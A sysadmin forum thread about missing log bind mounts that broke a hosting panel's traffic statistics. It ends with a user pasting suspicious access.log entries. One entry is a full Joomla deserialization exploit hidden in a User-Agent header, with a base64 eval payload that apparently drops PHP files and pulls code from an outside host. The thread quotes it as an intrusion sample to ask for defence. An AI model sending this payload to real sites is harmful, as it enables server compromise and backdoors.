Hi, Last month I exceed my quota of Bandwidth by my ISP. Though all my websites are low traffic. But when tried to check the traffic status I found that for websites it is showing NAN. So I am unable to find the source of the problem. Please suggest the steps to find out the problem.
Maybe the BIND mount is missing for the website log directory. Can you see the access.log with current data inside in the log folder of the affected website?
Hi till Any solution on this? while running nethogs I find maxium process under www-data. is it normal? Code: ? root 192.168.0.10:80-178.162.199.39:52331 is above line in nethogs looks ok
Is it showing NAN for all websites or just for this one? I don't know a software named maxium, it does not belong to ISPConfig.
NAN for most websites, not all. No the software is nethogs. The maximum process shown there www-data.
If the access logs are there in /var/www/domain.tld/log/ for the sites that shows NAN, then I don't know why it can not count the traffic for them.
Sorry Till, I was checking this in var/log/ispconfig/httpd/domain.tld/ and it is showing there alright. but log file/symlink is missing in the path - /var/www/domain.tld/log/ How I can restore that?
Create the missing bind mount line in /etc/fstab (check out the other bind mounts for the exact syntax) and then run "mount -a" to activate it.
I have created all the entries in the /etc/fstab. when running "sudo mount -a" I am getting Code: mount: mount point var/www/clients/client22/web35/log does not exist
Yup. You are absolutely right. for that particular line I missed the /. Thank you Now mount command doesn't raise any error. The traffic meter will be updated at midnight I think?
Hi Till This type of code I find in access.log of one vhost file, there may be other. Can you suggest some steps to prevent it. Code: 212.227.11.117 - - [03/Jan/2017:20:17:17 +0530] "GET / HTTP/1.1" 200 0 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:3918:\"eval(base64_decode('JGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9sb2wucGhwIiA7DQokZnA9Zm9wZW4oIiRjaGVjayIsIncrIik7DQpmd3JpdGUoJGZwLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21aMWJtTjBhVzl1SUdoMGRIQmZaMlYwS0NSMWNtd3BldzBLQ1NScGJTQTlJR04xY214ZmFXNXBkQ2drZFhKc0tUc05DZ2xqZFhKc1gzTmxkRzl3ZENna2FXMHNJRU5WVWt4UFVGUmZVa1ZVVlZKT1ZGSkJUbE5HUlZJc0lERXBPdzBLQ1dOMWNteGZjMlYwYjNCMEtDUnBiU3dnUTFWU1RFOVFWRjlEVDA1T1JVTlVWRWxOUlU5VlZDd2dNVEFwT3cwS0NXTjFjbXhmYzJWMGIzQjBLQ1JwYlN3Z1ExVlNURTlRVkY5R1QweE1UMWRNVDBOQlZFbFBUaXdnTVNrN0RRb0pZM1Z5YkY5elpYUnZjSFFvSkdsdExDQkRWVkpNVDFCVVgwaEZRVVJGVWl3Z01DazdEUW9KY21WMGRYSnVJR04xY214ZlpYaGxZeWdrYVcwcE93MEtDV04xY214ZlkyeHZjMlVvSkdsdEtUc05DbjBOQ2lSamFHVmpheUE5SUNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwyeHBZbkpoY21sbGN5OXFiMjl0YkdFdlkzTnpMbkJvY0NJZ093MEtKSFJsZUhRZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6SXhNaTR5TWpjdU1URXVNVEUzTDJkbGRDOWpjM011ZEhoMEp5azdEUW9rYjNCbGJpQTlJR1p2Y0dWdUtDUmphR1ZqYXl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJpd2dKSFJsZUhRcE93MEtabU5zYjNObEtDUnZjR1Z1S1RzTkNtbG1LR1pwYkdWZlpYaHBjM1J6S0NSamFHVmpheWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTGlJOEwySnlQaUk3RFFwOVpXeHpaU0FOQ2lBZ1pXTm9ieUFpYm05MElHVjRhWFJ6SWpzTkNtVmphRzhnSW1SdmJtVWdMbHh1SUNJZ093MEtKR05vWldOck1pQTlJQ1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJ4cFluSmhjbWxsY3k5cWIyOXRiR0V2YW0xaGFXd3VjR2h3SWlBN0RRb2tkR1Y0ZERJZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6SXhNaTR5TWpjdU1URXVNVEUzTDJkbGRDOXRMblI0ZENjcE93MEtKRzl3Wlc0eUlEMGdabTl3Wlc0b0pHTm9aV05yTWl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNCbGJqSXNJQ1IwWlhoME1pazdEUXBtWTJ4dmMyVW9KRzl3Wlc0eUtUc05DbWxtS0dacGJHVmZaWGhwYzNSektDUmphR1ZqYXpJcEtYc05DaUFnSUNCbFkyaHZJQ1JqYUdWamF6SXVJand2WW5JK0lqc05DbjFsYkhObElBMEtJQ0JsWTJodklDSnViM1FnWlhocGRITXlJanNOQ21WamFHOGdJbVJ2Ym1VeUlDNWNiaUFpSURzTkNnMEtKR05vWldOck16MGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTkzTG1oMGJTSWdPdzBLSkhSbGVIUXpJRDBnYUhSMGNGOW5aWFFvSjJoMGRIQTZMeTh5TVRJdU1qSTNMakV4TGpFeE55OW5aWFF2ZHk1MGVIUW5LVHNOQ2lSdmNETTlabTl3Wlc0b0pHTm9aV05yTXl3Z0ozY25LVHNOQ21aM2NtbDBaU2drYjNBekxDUjBaWGgwTXlrN0RRcG1ZMnh2YzJVb0pHOXdNeWs3RFFvTkNpUmphR1ZqYXpROUpGOVRSVkpXUlZKYkowUlBRMVZOUlU1VVgxSlBUMVFuWFNBdUlDSXZiR2xpY21GeWFXVnpMMnB2YjIxc1lTOWphR1ZqYXk1d2FIQWlJRHNOQ2lSMFpYaDBOQ0E5SUdoMGRIQmZaMlYwS0Nkb2RIUndPaTh2TWpFeUxqSXlOeTR4TVM0eE1UY3ZaMlYwTDJNdWRIaDBKeWs3RFFva2IzQTBQV1p2Y0dWdUtDUmphR1ZqYXpRc0lDZDNKeWs3RFFwbWQzSnBkR1VvSkc5d05Dd2tkR1Y0ZERRcE93MEtabU5zYjNObEtDUnZjRFFwT3cwS0RRb2tZMmhsWTJzMVBTUmZVMFZTVmtWU1d5ZEVUME5WVFVWT1ZGOVNUMDlVSjEwZ0xpQWlMMnhwWW5KaGNtbGxjeTlxYjI5dGJHRXZhbTFoYVd4ekxuQm9jQ0lnT3cwS0pIUmxlSFExSUQwZ2FIUjBjRjluWlhRb0oyaDBkSEE2THk4eU1USXVNakkzTGpFeExqRXhOeTluWlhRdmJXMHVkSGgwSnlrN0RRb2tiM0ExUFdadmNHVnVLQ1JqYUdWamF6VXNJQ2QzSnlrN0RRcG1kM0pwZEdVb0pHOXdOU3drZEdWNGREVXBPdzBLWm1Oc2IzTmxLQ1J2Y0RVcE93MEtEUW9rWTJobFkyczJQU1JmVTBWU1ZrVlNXeWRFVDBOVlRVVk9WRjlTVDA5VUoxMGdMaUFpTDJ4cFluSmhjbWxsY3k5cWIyOXRiR0V2YW5WelpYSXVjR2h3SWlBN0RRb2tkR1Y0ZERZZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6SXhNaTR5TWpjdU1URXVNVEUzTDJkbGRDOTFjMlZ5TG5SNGRDY3BPdzBLSkc5d05qMW1iM0JsYmlna1kyaGxZMnMyTENBbmR5Y3BPdzBLWm5keWFYUmxLQ1J2Y0RZc0pIUmxlSFEyS1RzTkNtWmpiRzl6WlNna2IzQTJLVHNOQ2cwS0pIUnZlaUE5SUNKalpXOXlaWEJzZVRFeE1rQm5iV0ZwYkM1amIyMHNaMkZpWW5rdVkyRnphRUI1WVc1a1pYZ3VZMjl0TEc1bGQzTm9aV3hzTVRkQVoyMWhhV3d1WTI5dExHTmhjbkp2Ykd4a1lYSnNhVzVuTURBeFFHZHRZV2xzTG1OdmJTSTdEUW9rYzNWaWFtVmpkQ0E5SUNkS2IyMGdlbnA2SUNjZ0xpQWtYMU5GVWxaRlVsc25VMFZTVmtWU1gwNUJUVVVuWFRzTkNpUm9aV0ZrWlhJZ1BTQW5abkp2YlRvZ1MyVnJhMkZwSUZObGJuTmxiaUE4ZG05dVVtVnBibWhsY25wTGJHRjFjMEJUWVdscmIzVnVZVWhwWW1rdVkyOXRQaWNnTGlBaVhISmNiaUk3RFFva2JXVnpjMkZuWlNBOUlDSlRhR1ZzYkhvZ09pQm9kSFJ3T2k4dklpQXVJQ1JmVTBWU1ZrVlNXeWRUUlZKV1JWSmZUa0ZOUlNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc0xuQm9jRDkxSWlBdUlDSmNjbHh1SWlBdUlIQm9jRjkxYm1GdFpTZ3BJQzRnSWx4eVhHNGlPdzBLSkhObGJuUnRZV2xzSUQwZ1FHMWhhV3dvSkhSdmVpd2dKSE4xWW1wbFkzUXNJQ1J0WlhOellXZGxMQ0FrYUdWaFpHVnlLVHNOQ2cwS1FIVnViR2x1YXloZlgwWkpURVZmWHlrN0RRb05DZzBLUHo0PScpKTsNCmZjbG9zZSgkZnApOw=='));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd" then in another vhost which is a joomla site, but the line is seeking for wordpress folder Code: 185.50.25.7 - - [03/Jan/2017:02:21:20 +0530] "GET /wp-admin/network/system.php HTTP/1.1" 404 1364 "http://bluebellsschool.org/wp-admin/network/system.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
1) You can e.g. use th apache mod_security module to sanitize URL's and block access. 2) That's harmless, just ignore it.